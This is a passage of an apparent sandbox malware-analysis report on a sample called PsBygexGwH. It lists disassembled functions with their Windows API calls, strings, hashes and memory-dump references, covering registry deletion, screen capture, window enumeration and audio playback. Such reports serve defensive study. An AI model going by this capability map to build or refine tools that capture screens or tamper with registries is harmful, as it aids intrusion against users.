VariantClear.OLEAUT32(?), ref: 001917E7
VariantInit.OLEAUT32(00000000), ref: 00191823

Strings

Default, xrefs: 001916AF
%4d%02d%02d%02d%02d%02d, xrefs: 00191625

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: ac7307066c8a81c078e7b6d60c88a47db503ba5f425b21d722c7e5de76cb5745
Instruction ID: bca642faf9796248fb9626aefa74a2f81cf36343c5e5124c054170c0bb84195e
Opcode Fuzzy Hash: ac7307066c8a81c078e7b6d60c88a47db503ba5f425b21d722c7e5de76cb5745
Instruction Fuzzy Hash: 15D10631A00116FBEF089FA5E885B7DB7B5BF45700F12805AF446AB590DB30DD92DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001AB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

Part of subcall function 001AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001AB6AE,?,?), ref: 001AC9B5
Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001AC9F1
Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA68
Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001AB6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001AB772
RegDeleteValueW.ADVAPI32(?,?), ref: 001AB80A
RegCloseKey.ADVAPI32(?), ref: 001AB87E
RegCloseKey.ADVAPI32(?), ref: 001AB89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 001AB8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001AB904
RegDeleteKeyW.ADVAPI32(?,?), ref: 001AB922
FreeLibrary.KERNEL32(00000000), ref: 001AB983
RegCloseKey.ADVAPI32(00000000), ref: 001AB994

Strings

advapi32.dll, xrefs: 001AB8ED
RegDeleteKeyExW, xrefs: 001AB8FE

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 53592d928b5a1e1c4cf40ed344e2efe5e5d12e1fe12aa0b3b1cc91ecd7ac3e6e
Instruction ID: b3a2f4749b089407a60947802004a2cb1a8f10ffcc99c4dc80863dbcdc26d750
Opcode Fuzzy Hash: 53592d928b5a1e1c4cf40ed344e2efe5e5d12e1fe12aa0b3b1cc91ecd7ac3e6e
Instruction Fuzzy Hash: 22C18A78208281EFD714DF28C494F2ABBE5BF85308F14855CF59A8B6A2CB75EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001A255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 001A25D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001A25E8
CreateCompatibleDC.GDI32(?), ref: 001A25F4
SelectObject.GDI32(00000000,?), ref: 001A2601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 001A266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001A26AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001A26D0
SelectObject.GDI32(?,?), ref: 001A26D8
DeleteObject.GDI32(?), ref: 001A26E1
DeleteDC.GDI32(?), ref: 001A26E8
ReleaseDC.USER32(00000000,?), ref: 001A26F3

Strings

(, xrefs: 001A268D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 003548b84cc3f4b3bdd0483486eb2679e82c7e3149634bd7dc5818e5e5f75cdc
Instruction ID: def42bbc099e4a0f75f853aa2054e61e21ec755d20e8cc44115155bd8cf86a69
Opcode Fuzzy Hash: 003548b84cc3f4b3bdd0483486eb2679e82c7e3149634bd7dc5818e5e5f75cdc
Instruction Fuzzy Hash: 3B61E475D00219EFCF04CFA8D984EAEBBB6FF58310F208529E955A7250D770A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0015DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0015DAA1

Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D659
Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D66B
Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D67D
Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D68F
Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D6A1
Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D6B3
Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D6C5
Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D6D7
Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D6E9
Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D6FB
Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D70D
Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D71F
Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D731

_free.LIBCMT ref: 0015DA96

Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0

_free.LIBCMT ref: 0015DAB8
_free.LIBCMT ref: 0015DACD
_free.LIBCMT ref: 0015DAD8
_free.LIBCMT ref: 0015DAFA
_free.LIBCMT ref: 0015DB0D
_free.LIBCMT ref: 0015DB1B
_free.LIBCMT ref: 0015DB26
_free.LIBCMT ref: 0015DB5E
_free.LIBCMT ref: 0015DB65
_free.LIBCMT ref: 0015DB82
_free.LIBCMT ref: 0015DB9A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 2ce5a1da482f361c99b039f7b8ed8ceabe027100e0f0cadc8a75d085c873081c
Instruction ID: 945c855cfb420bff0f283ca668b0ac3a4a860912e311d8e4c2ced25a69ef4893
Opcode Fuzzy Hash: 2ce5a1da482f361c99b039f7b8ed8ceabe027100e0f0cadc8a75d085c873081c
Instruction Fuzzy Hash: 96314D32604705DFEB31AA39E845B9A77E9FF12316F154419E869EF291DF31AC88C720

Uniqueness

Uniqueness Score: -1.00%

Function 0018365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0018369C
_wcslen.LIBCMT ref: 001836A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00183797
GetClassNameW.USER32(?,?,00000400), ref: 0018380C
GetDlgCtrlID.USER32(?), ref: 0018385D
GetWindowRect.USER32(?,?), ref: 00183882
GetParent.USER32(?), ref: 001838A0
ScreenToClient.USER32(00000000), ref: 001838A7
GetClassNameW.USER32(?,?,00000100), ref: 00183921
GetWindowTextW.USER32(?,?,00000400), ref: 0018395D

Strings

%s%u, xrefs: 00183734

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 0d3324ad51d693bcab778ad896edf9d310b584586b4d1465eced84dc2099df43
Instruction ID: c6a0e9cd4d09819d11a5f16fb3b94f30710f2aed0b2b81b7a8ff5e87c3a68e1c
Opcode Fuzzy Hash: 0d3324ad51d693bcab778ad896edf9d310b584586b4d1465eced84dc2099df43
Instruction Fuzzy Hash: 7591D471604606AFD718EF24C885FAAF7A9FF44714F044629F9A9C2190EB30EB45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00184954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00184994
GetWindowTextW.USER32(?,?,00000400), ref: 001849DA
_wcslen.LIBCMT ref: 001849EB
CharUpperBuffW.USER32(?,00000000), ref: 001849F7
_wcsstr.LIBVCRUNTIME ref: 00184A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00184A64
GetWindowTextW.USER32(?,?,00000400), ref: 00184A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00184AE6
GetClassNameW.USER32(?,?,00000400), ref: 00184B20
GetWindowRect.USER32(?,?), ref: 00184B8B

Strings

ThumbnailClass, xrefs: 00184A6F, 00184AF1

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 22ae7580e67f0ee96f4da7f77ecb873534fb3ba7031df73d69f8843f3100edf5
Instruction ID: 5672a855a3c3126d8e448265206954e50f20eaf333d96634bfc40db9cb7f8a3a
Opcode Fuzzy Hash: 22ae7580e67f0ee96f4da7f77ecb873534fb3ba7031df73d69f8843f3100edf5
Instruction Fuzzy Hash: DE91AC710042069BDB18EF14C985FAA77E9FF94314F04846AFD869A196EF30EE45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001ACC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001ACC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 001ACC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001ACD48

Part of subcall function 001ACC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001ACCAA
Part of subcall function 001ACC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 001ACCBD
Part of subcall function 001ACC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001ACCCF
Part of subcall function 001ACC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001ACD05
Part of subcall function 001ACC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001ACD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 001ACCF3

Strings

advapi32.dll, xrefs: 001ACCB8
RegDeleteKeyExW, xrefs: 001ACCC9

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 21a147914df9dbe48204b1d62c34ec267d091d97bc82a89fdac8cc1c98c08a70
Instruction ID: a24c1e89ff0810811d2cc5e99d1b273c7f77336230795d9d81f2c3f9d2fd09f8
Opcode Fuzzy Hash: 21a147914df9dbe48204b1d62c34ec267d091d97bc82a89fdac8cc1c98c08a70
Instruction Fuzzy Hash: 3931AD79901128BBDB209B95DC88EFFBB7CEF56750F000165F906E2241DB708A85DAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00193D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00193D40
_wcslen.LIBCMT ref: 00193D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00193D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00193DBE
RemoveDirectoryW.KERNEL32(?), ref: 00193DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00193E55
CloseHandle.KERNEL32(00000000), ref: 00193E60
CloseHandle.KERNEL32(00000000), ref: 00193E6B

Strings

:, xrefs: 00193D82
\, xrefs: 00193D77
\??\%s, xrefs: 00193D5B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 14f476ebfd10f11d9d9d885deb203b6e37e458fb08450e297720491b45bde056
Instruction ID: 2d0b4bfeaa9b45effb038a3cc0409e7c713d5fe605705e0432fa2b3f2f232d7d
Opcode Fuzzy Hash: 14f476ebfd10f11d9d9d885deb203b6e37e458fb08450e297720491b45bde056
Instruction Fuzzy Hash: 33317E76904209ABDB219FA0DC49FEB37BDEF88700F5041B5F619D6160EB7497848B64

Uniqueness

Uniqueness Score: -1.00%

Function 0018E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0018E6B4

Part of subcall function 0013E551: timeGetTime.WINMM(?,?,0018E6D4), ref: 0013E555

Sleep.KERNEL32(0000000A), ref: 0018E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0018E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0018E727
SetActiveWindow.USER32 ref: 0018E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0018E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0018E773
Sleep.KERNEL32(000000FA), ref: 0018E77E
IsWindow.USER32 ref: 0018E78A
EndDialog.USER32(00000000), ref: 0018E79B

Strings

BUTTON, xrefs: 0018E719

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 124153c5d7d7099c8e12ef1d3e6527027c34543059bf4bee63e316656c894983
Instruction ID: 11b7b94453a044d248d0b686b5147b003e7a3d015f7e79356ac8e5eb963a528c
Opcode Fuzzy Hash: 124153c5d7d7099c8e12ef1d3e6527027c34543059bf4bee63e316656c894983
Instruction Fuzzy Hash: 532154B0200205AFEB106F64ECC9E353BA9F754759F601525F916C29B1DBB1AD80DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0018E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0018EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0018EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0018EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0018EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0018EAA7

Strings

play PlayMe, xrefs: 0018EAA2
status PlayMe mode, xrefs: 0018EA58
play PlayMe wait, xrefs: 0018EA91
open , xrefs: 0018EA0C
alias PlayMe, xrefs: 0018EA36
close PlayMe, xrefs: 0018EA6E, 0018EA9B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 28e92a085a408fb28af919f66b4680813c9f1fce2ea07118da2b60fb73fc5190
Instruction ID: f90502d1a80df1cda67381aefa942b7fdbb2221a7db6028a17daec3114a5133b
Opcode Fuzzy Hash: 28e92a085a408fb28af919f66b4680813c9f1fce2ea07118da2b60fb73fc5190
Instruction Fuzzy Hash: 6B1124316502697DD724F766EC4ADFF6ABCEBE1F44F400429B411A20D1EF705A55CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00185CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00185CE2
GetWindowRect.USER32(00000000,?), ref: 00185CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00185D59
GetDlgItem.USER32(?,00000002), ref: 00185D69
GetWindowRect.USER32(00000000,?), ref: 00185D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00185DCF
GetDlgItem.USER32(?,000003E9), ref: 00185DDD
GetWindowRect.USER32(00000000,?), ref: 00185DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00185E31
GetDlgItem.USER32(?,000003EA), ref: 00185E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00185E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00185E67

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 84e46a693d30d24681fff0ee7358e3d50dbd4dd18ab35491efcd31acde74e53e
Instruction ID: 40897ce5066d6158d2f1bbebd3fe4abd5694bfd2fff4d7d89c221a22b6737bd3
Opcode Fuzzy Hash: 84e46a693d30d24681fff0ee7358e3d50dbd4dd18ab35491efcd31acde74e53e
Instruction Fuzzy Hash: 10510071A00605AFDF18DFA8DD89AAEBBB6FB48300F148229F915E6690D7709E44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00138BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00138F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00138BE8,?,00000000,?,?,?,?,00138BBA,00000000,?), ref: 00138FC5

DestroyWindow.USER32(?), ref: 00138C81
KillTimer.USER32(00000000,?,?,?,?,00138BBA,00000000,?), ref: 00138D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00176973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00138BBA,00000000,?), ref: 001769A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00138BBA,00000000,?), ref: 001769B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00138BBA,00000000), ref: 001769D4
DeleteObject.GDI32(00000000), ref: 001769E6

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 77b90b6d61f5e1483c949d914d8dc856bb78b9791f7224cdcc6e1f2d093e19c4
Instruction ID: d99da8323a7882f0eaed709b9dad48a23aea794cd88e2b52e4adf34321684e98
Opcode Fuzzy Hash: 77b90b6d61f5e1483c949d914d8dc856bb78b9791f7224cdcc6e1f2d093e19c4
Instruction Fuzzy Hash: 53616A31502B00EFCB259F25DA58B66B7F1FB5031AF14951CF046AB9A0CB75ADC0DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00139838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00139944: GetWindowLongW.USER32(?,000000EB), ref: 00139952

GetSysColor.USER32(0000000F), ref: 00139862

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: f7ac4ac02bec73373bb96c5805e93b4e2d5e384beaba19adf2536ef27962e683
Instruction ID: 8a449e27edc5ff2a6503f75cfdde598730740a2fbb40247db9b5e39f2b24c257
Opcode Fuzzy Hash: f7ac4ac02bec73373bb96c5805e93b4e2d5e384beaba19adf2536ef27962e683
Instruction Fuzzy Hash: 2941A231104644EFDF205F3C9C88BBA7BA5EB86330F144655F9A6972E1D7B19C81DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001896E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0016F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00189717
LoadStringW.USER32(00000000,?,0016F7F8,00000001), ref: 00189720

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0016F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00189742
